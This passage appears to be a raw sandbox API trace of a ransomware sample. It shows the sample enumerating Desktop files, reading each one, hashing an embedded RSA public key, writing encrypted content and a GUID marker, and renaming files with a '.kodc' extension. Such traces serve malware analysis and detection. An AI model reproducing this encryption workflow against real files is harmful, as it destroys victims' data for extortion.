out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6d0 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6b8 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a688 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a670 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333ff48 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.726] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x141b2, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x141b2, lpOverlapped=0x0) returned 1 [0097.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.727] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x141b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.727] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0097.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.727] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.727] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.728] CloseHandle (hObject=0x5cc) returned 1 [0097.729] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h7MYO.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h7myo.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h7MYO.xlsx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h7myo.xlsx.kodc")) returned 1 [0097.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.730] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0097.731] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5ed0c20, ftCreationTime.dwHighDateTime=0x1d5bb1b, ftLastAccessTime.dwLowDateTime=0xb55f320, ftLastAccessTime.dwHighDateTime=0x1d5b9e1, ftLastWriteTime.dwLowDateTime=0xb55f320, ftLastWriteTime.dwHighDateTime=0x1d5b9e1, nFileSizeHigh=0x0, nFileSizeLow=0xb92f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hCF6SL6FoYE73x.mp4", cAlternateFileName="HCF6SL~1.MP4")) returned 1 [0097.731] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hCF6SL6FoYE73x.mp4") returned=".mp4" [0097.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hCF6SL6FoYE73x.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hcf6sl6foye73x.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.732] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=47407) returned 1 [0097.732] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.735] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb909, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.735] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.736] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xb92f, lpOverlapped=0x0) returned 1 [0097.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.737] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.737] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.737] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.737] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.738] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.738] GetLastError () returned 0x0 [0097.738] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.738] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.738] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.738] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.738] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb930) returned 0x9ba4d90 [0097.738] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333ff48 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a670 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333ff90 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a688 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6b8 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6d0 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.739] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6b8 | out: hHeap=0x630000) returned 1 [0097.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6d0 | out: hHeap=0x630000) returned 1 [0097.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a6d0 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a6b8 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6d0 | out: hHeap=0x630000) returned 1 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6b8 | out: hHeap=0x630000) returned 1 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.740] GetCurrentThreadId () returned 0x42c [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696068 [0097.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.741] GetCurrentThreadId () returned 0x42c [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6b8 [0097.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6d0 [0097.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6a0 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a6e8 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6b8 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6b8 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0097.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0097.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0097.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6b8 | out: hHeap=0x630000) returned 1 [0097.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 